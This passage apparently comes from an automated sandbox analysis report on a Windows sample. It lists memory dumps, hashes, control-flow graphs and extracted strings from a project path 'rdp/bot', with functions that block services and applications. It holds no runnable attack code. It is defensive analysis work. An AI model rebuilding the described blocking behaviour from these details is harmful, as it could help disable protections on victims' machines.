                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                    • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                    • API String ID: 3039259412-1782951725
                                    • Opcode ID: 6e9baee691a7f56f21bdd07bbdaf21b6c270e43383445d7bf84017090ebc1146
                                    • Instruction ID: 1771f2204068521a4264e28a06702349754b7e8c0903af5521841fc52251ef0c
                                    • Opcode Fuzzy Hash: 6e9baee691a7f56f21bdd07bbdaf21b6c270e43383445d7bf84017090ebc1146
                                    • Instruction Fuzzy Hash: 43D15E21A4C78381FBA0AB12E4503B9BAA0BB44744F904133DA4DA67F5DE7DE945D723
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorLast$Process$CloseFullHandleImageNameNextOpenProcess32Querystrcmp
                                    • String ID: [E] (%s) -> CreateToolhelp32Snapshot failed(gle=%lu)$[E] (%s) -> OpenProcess failed(szExeFile=%s,gle=%lu)$[E] (%s) -> Process32First failed(gle=%lu)$[E] (%s) -> Process32Next failed(gle=%lu)$[E] (%s) -> QueryFullProcessImageNameW failed(gle=%lu)$[I] (%s) -> Done(szExeFile=%s,th32ProcessID=%d)$app$block_app
                                    • API String ID: 1025937399-1899507746
                                    • Opcode ID: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                    • Instruction ID: b9f8a85662ff99a06f78256079d0701aaf7308f9e40e8a4b9d69d797e8050618
                                    • Opcode Fuzzy Hash: 1ed3de061666447cae0baa0fc6ff6d421445239b67af7976eba0ec9335f99bcd
                                    • Instruction Fuzzy Hash: 8AF14A51F8C71782FAF07756A490378BA94AF45B54FD00233C60EA62F5CE7DE881A227

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                    • String ID:
                                    • API String ID: 3714283218-0
                                    • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                    • Instruction ID: 455a0688751c8791972cd63dbb945a518289fd44a51eeb42f8bf9759c2d7540c
                                    • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                    • Instruction Fuzzy Hash: 14513329A8864685EBD0BB12E860779EBE0AF44B44F855137CD0DA73F1DE3CE4609763

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 7ff7e3ce45d5-7ff7e3ce45f1 1 7ff7e3ce4687-7ff7e3ce46b5 call 7ff7e3ce14e2 0->1 2 7ff7e3ce45f7-7ff7e3ce45fa 0->2 13 7ff7e3ce4b39-7ff7e3ce4b4a 1->13 3 7ff7e3ce4600-7ff7e3ce4604 2->3 4 7ff7e3ce46ba-7ff7e3ce46e8 call 7ff7e3ce14e2 2->4 6 7ff7e3ce4606-7ff7e3ce460a 3->6 7 7ff7e3ce4610-7ff7e3ce4625 fopen 3->7 4->13 6->7 10 7ff7e3ce46ed-7ff7e3ce471b call 7ff7e3ce14e2 6->10 11 7ff7e3ce4720-7ff7e3ce4749 _errno call 7ff7e3ce14e2 _errno 7->11 12 7ff7e3ce462b-7ff7e3ce4640 fseek 7->12 10->13 28 7ff7e3ce478f-7ff7e3ce47a3 _errno 11->28 29 7ff7e3ce474b-7ff7e3ce4758 11->29 19 7ff7e3ce47f3-7ff7e3ce4800 call 7ff7e3cf04e8 12->19 20 7ff7e3ce4646-7ff7e3ce466f _errno call 7ff7e3ce14e2 _errno 12->20 16 7ff7e3ce4b53-7ff7e3ce4b60 13->16 17 7ff7e3ce4b4c 13->17 22 7ff7e3ce4b62-7ff7e3ce4b73 call 7ff7e3ce14e2 16->22 23 7ff7e3ce4b99-7ff7e3ce4ba0 16->23 17->16 36 7ff7e3ce4802 19->36 37 7ff7e3ce482b-7ff7e3ce4854 _errno call 7ff7e3ce14e2 _errno 19->37 33 7ff7e3ce4675-7ff7e3ce4682 20->33 34 7ff7e3ce47da-7ff7e3ce47ee _errno 20->34 32 7ff7e3ce4b78-7ff7e3ce4b8a 22->32 23->22 35 7ff7e3ce4b28-7ff7e3ce4b2b 28->35 29->28 33->1 34->35 39 7ff7e3ce4b35-7ff7e3ce4b37 35->39 40 7ff7e3ce4b2d-7ff7e3ce4b30 fclose 35->40 41 7ff7e3ce4b23 36->41 42 7ff7e3ce4808-7ff7e3ce480d 36->42 48 7ff7e3ce4856-7ff7e3ce4863 37->48 49 7ff7e3ce489a-7ff7e3ce48ae _errno 37->49 39->13 43 7ff7e3ce4ba2-7ff7e3ce4bbb call 7ff7e3ce14e2 39->43 40->39 41->35 45 7ff7e3ce48b3-7ff7e3ce48cb fseek 42->45 46 7ff7e3ce4813-7ff7e3ce4818 42->46 43->32 50 7ff7e3ce4941-7ff7e3ce496a _errno call 7ff7e3ce14e2 _errno 45->50 51 7ff7e3ce48cd-7ff7e3ce48d9 45->51 46->45 47 7ff7e3ce481e-7ff7e3ce4826 46->47 47->35 48->49 49->35 61 7ff7e3ce49b0-7ff7e3ce49c4 _errno 50->61 62 7ff7e3ce496c-7ff7e3ce4979 50->62 54 7ff7e3ce48df-7ff7e3ce48e5 51->54 55 7ff7e3ce49c9-7ff7e3ce49eb GetProcessHeap HeapAlloc 51->55 59 7ff7e3ce4b92-7ff7e3ce4b97 54->59 60 7ff7e3ce48eb 54->60 55->54 58 7ff7e3ce49f1-7ff7e3ce4a07 call 7ff7e3ce14e2 55->58 58->54 59->35 64 7ff7e3ce48f0-7ff7e3ce48ff 60->64 61->35 62->61 66 7ff7e3ce4905-7ff7e3ce4907 64->66 67 7ff7e3ce4a9e-7ff7e3ce4aa7 64->67 66->67 70 7ff7e3ce490d-7ff7e3ce4930 fread 66->70 68 7ff7e3ce4acf-7ff7e3ce4af2 call 7ff7e3ce14e2 67->68 69 7ff7e3ce4aa9-7ff7e3ce4aab 67->69 72 7ff7e3ce4aad-7ff7e3ce4ab2 68->72 71 7ff7e3ce4af4-7ff7e3ce4af9 69->71 69->72 70->67 74 7ff7e3ce4936 70->74 77 7ff7e3ce4b03-7ff7e3ce4b0c 71->77 78 7ff7e3ce4afb-7ff7e3ce4b01 71->78 72->35 75 7ff7e3ce4ab4-7ff7e3ce4acd GetProcessHeap HeapFree 72->75 79 7ff7e3ce4a0c-7ff7e3ce4a35 _errno call 7ff7e3ce14e2 _errno 74->79 80 7ff7e3ce493c-7ff7e3ce493f 74->80 75->35 77->78 78->35 83 7ff7e3ce4a7b-7ff7e3ce4a8f _errno 79->83 84 7ff7e3ce4a37-7ff7e3ce4a44 79->84 80->64 83->64 84->83
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno$fclosefflushfopenfseekfwrite
                                    • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                    • API String ID: 2897271634-4120527733
                                    • Opcode ID: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                    • Instruction ID: ad61715c2a0c55316088d65c239798af783427032aa40f830b940eef96726b3b
                                    • Opcode Fuzzy Hash: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
                                    • Instruction Fuzzy Hash: B9D18322A88A0791FA90BB56E850378AF91BF40795FD55233D90DB73F0DE3CE4569322

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: _errno$fopenfwrite
                                    • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                    • API String ID: 1336347884-544371937
                                    • Opcode ID: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                    • Instruction ID: edbe0b80c426c4a37aaa9cd24e444dc92e80ea0e8879337cfdbaabf590098be6
                                    • Opcode Fuzzy Hash: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
                                    • Instruction Fuzzy Hash: 88518162A8864391FA90BB56D9503B8EB91AF40794FD84233D91DA73F0DF3CE5169332

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 375 7ff7e3ce168c-7ff7e3ce16b4 InitializeCriticalSectionAndSpinCount 376 7ff7e3ce17e0-7ff7e3ce1801 GetLastError call 7ff7e3ce14e2 375->376 377 7ff7e3ce16ba-7ff7e3ce16ee call 7ff7e3ce19c0 call 7ff7e3ce6b9b 375->377 382 7ff7e3ce1803 376->382 383 7ff7e3ce1822-7ff7e3ce1828 376->383 390 7ff7e3ce16f4-7ff7e3ce170b strlen 377->390 391 7ff7e3ce17b9-7ff7e3ce17d1 call 7ff7e3ce14e2 377->391 385 7ff7e3ce18e1-7ff7e3ce18e6 382->385 386 7ff7e3ce1809-7ff7e3ce1816 382->386 388 7ff7e3ce18eb 383->388 389 7ff7e3ce182e-7ff7e3ce1834 383->389 385->391 386->383 401 7ff7e3ce18f5-7ff7e3ce18fa 388->401 392 7ff7e3ce1836-7ff7e3ce183c 389->392 393 7ff7e3ce1860-7ff7e3ce1863 389->393 397 7ff7e3ce1723-7ff7e3ce1726 390->397 398 7ff7e3ce170d-7ff7e3ce1710 390->398 402 7ff7e3ce17d6-7ff7e3ce17df 391->402 399 7ff7e3ce1842-7ff7e3ce1848 392->399 400 7ff7e3ce1909-7ff7e3ce190e 392->400 395 7ff7e3ce1865-7ff7e3ce1868 393->395 396 7ff7e3ce187d-7ff7e3ce1883 393->396 403 7ff7e3ce18d7 395->403 404 7ff7e3ce186a-7ff7e3ce186d 395->404 405 7ff7e3ce1885-7ff7e3ce188a 396->405 406 7ff7e3ce18ff 396->406 410 7ff7e3ce1748-7ff7e3ce1791 strlen fopen 397->410 411 7ff7e3ce1728-7ff7e3ce1742 strcat strlen 397->411 398->397 407 7ff7e3ce1712-7ff7e3ce171f strlen 398->407 408 7ff7e3ce1913-7ff7e3ce1918 399->408 409 7ff7e3ce184e-7ff7e3ce1854 399->409 400->391 401->391 403->385 404->401 414 7ff7e3ce1873-7ff7e3ce1878 404->414 405->391 406->400 407->397 408->391 415 7ff7e3ce1856-7ff7e3ce185b 409->415 416 7ff7e3ce188f-7ff7e3ce1894 409->416 412 7ff7e3ce18ad-7ff7e3ce18c8 call 7ff7e3ce14e2 410->412 413 7ff7e3ce1797-7ff7e3ce17b3 call 7ff7e3ce14e2 410->413 411->410 412->391 413->391 421 7ff7e3ce191d-7ff7e3ce1937 call 7ff7e3ce14e2 413->421 414->391 415->391 416->391 421->402
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                    • API String ID: 3395718042-2291025694
                                    • Opcode ID: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                    • Instruction ID: 1e349780b27fa5f43144e0234d9cfa0ea85d5ddf858999501c63460fff3c59cf
                                    • Opcode Fuzzy Hash: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
                                    • Instruction Fuzzy Hash: 17516165E8C60382F7A07B42E4903B8DA91AF04744FD45233C50EA62F2DE7CE965E363

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 424 7ff7e3ce5e6f-7ff7e3ce5e80 425 7ff7e3ce5e86-7ff7e3ce5e89 424->425 426 7ff7e3ce5f72-7ff7e3ce5fa0 call 7ff7e3ce14e2 424->426 428 7ff7e3ce5e8f-7ff7e3ce5ed4 CreateFileA 425->428 429 7ff7e3ce5fa2-7ff7e3ce5fd0 call 7ff7e3ce14e2 425->429 434 7ff7e3ce5f32-7ff7e3ce5f35 426->434 432 7ff7e3ce5fd5-7ff7e3ce5ff9 GetLastError call 7ff7e3ce14e2 428->432 433 7ff7e3ce5eda-7ff7e3ce5f08 LockFileEx 428->433 429->434 448 7ff7e3ce6013-7ff7e3ce6019 432->448 449 7ff7e3ce5ffb 432->449 437 7ff7e3ce5f0e-7ff7e3ce5f21 433->437 438 7ff7e3ce60ba-7ff7e3ce60de GetLastError call 7ff7e3ce14e2 433->438 443 7ff7e3ce5f3e-7ff7e3ce5f4b 434->443 444 7ff7e3ce5f37 434->444 441 7ff7e3ce622b-7ff7e3ce622e CloseHandle 437->441 442 7ff7e3ce5f27-7ff7e3ce5f2c 437->442 454 7ff7e3ce60e0 438->454 455 7ff7e3ce60f8-7ff7e3ce60fe 438->455 446 7ff7e3ce6239 441->446 442->434 450 7ff7e3ce6245-7ff7e3ce625e call 7ff7e3ce14e2 442->450 445 7ff7e3ce5f51-7ff7e3ce5f62 call 7ff7e3ce14e2 443->445 443->446 444->443 461 7ff7e3ce5f67-7ff7e3ce5f71 445->461 446->450 451 7ff7e3ce601f-7ff7e3ce6025 448->451 452 7ff7e3ce61a9 448->452 457 7ff7e3ce60b0 449->457 458 7ff7e3ce6001-7ff7e3ce600e 449->458 450->461 459 7ff7e3ce6051-7ff7e3ce6054 451->459 460 7ff7e3ce6027-7ff7e3ce602d 451->460 473 7ff7e3ce61b3 452->473 462 7ff7e3ce60e6-7ff7e3ce60f3 454->462 463 7ff7e3ce6195 454->463 464 7ff7e3ce6104-7ff7e3ce610a 455->464 465 7ff7e3ce61ef 455->465 457->438 458->448 469 7ff7e3ce6056-7ff7e3ce6059 459->469 470 7ff7e3ce6072-7ff7e3ce6078 459->470 467 7ff7e3ce6033-7ff7e3ce6039 460->467 468 7ff7e3ce61d1 460->468 462->455 463->452 471 7ff7e3ce6143-7ff7e3ce6149 464->471 472 7ff7e3ce610c-7ff7e3ce610f 464->472 479 7ff7e3ce61f9 465->479 474 7ff7e3ce603f-7ff7e3ce6045 467->474 475 7ff7e3ce61db 467->475 468->475 469->473 478 7ff7e3ce605f-7ff7e3ce6062 469->478 482 7ff7e3ce607e 470->482 483 7ff7e3ce61c7 470->483 476 7ff7e3ce614f-7ff7e3ce6155 471->476 477 7ff7e3ce6217 471->477 480 7ff7e3ce6111-7ff7e3ce6114 472->480 481 7ff7e3ce612d-7ff7e3ce6133 472->481 484 7ff7e3ce61bd 473->484 487 7ff7e3ce6088 474->487 488 7ff7e3ce6047 474->488 475->465 489 7ff7e3ce6221 476->489 490 7ff7e3ce615b-7ff7e3ce6161 476->490 477->489 478->484 491 7ff7e3ce6068 478->491 495 7ff7e3ce6203 479->495 480->479 492 7ff7e3ce611a-7ff7e3ce611d 480->492 485 7ff7e3ce620d 481->485 486 7ff7e3ce6139 481->486 482->487 483->468 484->483 485->477 486->471 487->457 488->459 489->441 493 7ff7e3ce6163 490->493 494 7ff7e3ce616d 490->494 491->470 492->495 496 7ff7e3ce6123 492->496 493->494 494->463 495->485 496->481
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                    • API String ID: 2747014929-530486279
                                    • Opcode ID: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                    • Instruction ID: 1720312d96d056508157fcdd2878870620ce6e5d0deab6309d6083de66d0d18a
                                    • Opcode Fuzzy Hash: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
                                    • Instruction Fuzzy Hash: 92817E11D9C30B81FAB0B712A950378BA605F00355FD40333D96EA66F2EE7DE995A323

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 497 7ff7e3ce97f2-7ff7e3ce9814 498 7ff7e3ce98a5-7ff7e3ce98d3 call 7ff7e3ce14e2 497->498 499 7ff7e3ce981a-7ff7e3ce982d call 7ff7e3ce45d5 497->499 504 7ff7e3ce9833-7ff7e3ce983b 498->504 499->504 505 7ff7e3ce98d8-7ff7e3ce98e0 499->505 508 7ff7e3ce9854-7ff7e3ce9856 504->508 509 7ff7e3ce983d-7ff7e3ce984e GetProcessHeap HeapFree 504->509 506 7ff7e3ce98e6-7ff7e3ce9900 505->506 507 7ff7e3ce9b7e-7ff7e3ce9b83 505->507 510 7ff7e3ce9933-7ff7e3ce993a 506->510 507->504 511 7ff7e3ce9b9e-7ff7e3ce9baf call 7ff7e3ce14e2 508->511 512 7ff7e3ce985c-7ff7e3ce985f 508->512 509->508 516 7ff7e3ce995d-7ff7e3ce9998 GetProcessHeap HeapAlloc 510->516 517 7ff7e3ce993c-7ff7e3ce993f 510->517 518 7ff7e3ce9bb4 call 7ff7e3ce14e2 511->518 514 7ff7e3ce9861 512->514 515 7ff7e3ce9869-7ff7e3ce9876 512->515 514->515 519 7ff7e3ce9b92 515->519 520 7ff7e3ce987c-7ff7e3ce98a4 call 7ff7e3ce14e2 515->520 522 7ff7e3ce99d0-7ff7e3ce99e6 call 7ff7e3ce14e2 516->522 523 7ff7e3ce999a-7ff7e3ce99a1 516->523 517->516 521 7ff7e3ce9941-7ff7e3ce9947 517->521 519->511 525 7ff7e3ce9949 521->525 526 7ff7e3ce9918-7ff7e3ce991b 521->526 522->523 527 7ff7e3ce99a7-7ff7e3ce99ce 523->527 528 7ff7e3ce9b88-7ff7e3ce9b8d 523->528 531 7ff7e3ce9902-7ff7e3ce9905 525->531 532 7ff7e3ce994b-7ff7e3ce994e 525->532 535 7ff7e3ce992f 526->535 536 7ff7e3ce991d-7ff7e3ce9927 526->536 533 7ff7e3ce9a2a-7ff7e3ce9a37 527->533 528->504 531->535 540 7ff7e3ce9907-7ff7e3ce990a 531->540 537 7ff7e3ce9950-7ff7e3ce9953 532->537 538 7ff7e3ce9929 532->538 533->504 539 7ff7e3ce9a3d-7ff7e3ce9a40 533->539 535->510 536->535 537->535 541 7ff7e3ce9955-7ff7e3ce995b 537->541 538->535 539->504 542 7ff7e3ce9a46-7ff7e3ce9a4b 539->542 540->535 543 7ff7e3ce990c-7ff7e3ce9916 540->543 541->535 544 7ff7e3ce9a51-7ff7e3ce9a53 542->544 545 7ff7e3ce9b6e-7ff7e3ce9b74 542->545 543->535 546 7ff7e3ce9a55-7ff7e3ce9a57 544->546 547 7ff7e3ce99e8-7ff7e3ce99eb 544->547 545->507 548 7ff7e3ce9a26 546->548 549 7ff7e3ce9a59-7ff7e3ce9a5c 546->549 547->548 550 7ff7e3ce99ed-7ff7e3ce99f1 547->550 548->533 551 7ff7e3ce9a5e-7ff7e3ce9a61 549->551 552 7ff7e3ce9a1c-7ff7e3ce9a20 549->552 550->548 553 7ff7e3ce99f3-7ff7e3ce9a11 call 7ff7e3ce9770 551->553 554 7ff7e3ce9a63-7ff7e3ce9aa2 call 7ff7e3ce9770 * 2 551->554 552->548 553->552 560 7ff7e3ce9a13-7ff7e3ce9a16 553->560 554->552 563 7ff7e3ce9aa8-7ff7e3ce9aad 554->563 560->552 562 7ff7e3ce9af8-7ff7e3ce9b00 560->562 562->552 564 7ff7e3ce9b06-7ff7e3ce9b09 562->564 563->552 565 7ff7e3ce9ab3-7ff7e3ce9af3 strncpy * 2 563->565 566 7ff7e3ce9b0b-7ff7e3ce9b21 564->566 567 7ff7e3ce9b59-7ff7e3ce9b6c 564->567 565->552 568 7ff7e3ce9b28-7ff7e3ce9b54 strncpy 566->568 567->568 568->552
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.1312813044.00007FF7E3CE1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7E3CE0000, based on PE: true
                                    • Associated: 0000000D.00000002.1312780911.00007FF7E3CE0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312849037.00007FF7E3CF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312877285.00007FF7E3CF2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1312951351.00007FF7E3CFA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313048174.00007FF7E3CFC000.00000008.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 0000000D.00000002.1313100904.00007FF7E3CFF000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_7ff7e3ce0000_lr75sq5smrngkif9fpn.jbxd
                                    Similarity
                                    • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
